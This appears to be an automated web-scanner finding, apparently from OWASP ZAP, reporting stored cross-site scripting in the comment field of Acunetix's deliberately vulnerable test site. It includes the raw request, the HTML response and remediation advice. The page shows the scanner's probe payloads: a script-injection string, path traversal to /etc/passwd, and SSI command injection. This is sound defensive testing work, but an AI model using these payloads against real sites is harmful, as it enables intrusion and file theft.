          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%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&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E&btnSend=Send+comment
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:15 GMT
          Content-Length: 34006
          
          
          Response body (34006 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">&lt;/div&gt;&lt;scrIpt&gt;alert(1);&lt;/scRipt&gt;&lt;div&gt;</textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          tbComment
          Attack
          </div><scrIpt>alert(1);</scRipt><div>
          Evidence
          </div><scrIpt>alert(1);</scRipt><div>
          Solution

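          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur, or that provides constructs that make this weakness easier to avoid.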

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

